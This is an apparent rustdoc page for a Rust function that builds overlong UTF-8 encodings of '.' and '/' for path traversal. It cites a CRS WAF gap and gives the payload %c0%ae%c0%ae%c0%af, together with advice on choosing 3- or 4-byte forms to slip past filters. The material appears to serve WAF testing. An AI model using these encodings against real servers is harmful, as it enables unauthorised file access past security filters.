Skip to main content

overlong_utf8_path

Function overlong_utf8_path 

Source
pub fn overlong_utf8_path(path: &str, width: u8) -> String
Expand description

Overlong UTF-8 encoding of . and / for path traversal.

CRS GitHub issue #4189 (opened 2025-07, still open) — CRS does not alert on %c0%ae%c0%ae%c0%af (../ in 2-byte overlong UTF-8). Servers that strictly decode UTF-8 reject these as malformed; older JVMs, some C libs (CVE-2017-9805 Struts2), and a non-trivial set of internal services accept them. WAF gap + permissive backend = path traversal that the WAF doesn’t see.

width selects the overlong representation: 2 (default), 3, or 4 bytes. Each level is independently checked by some decoders, so a 3-byte overlong may pass where a 2-byte one is filtered.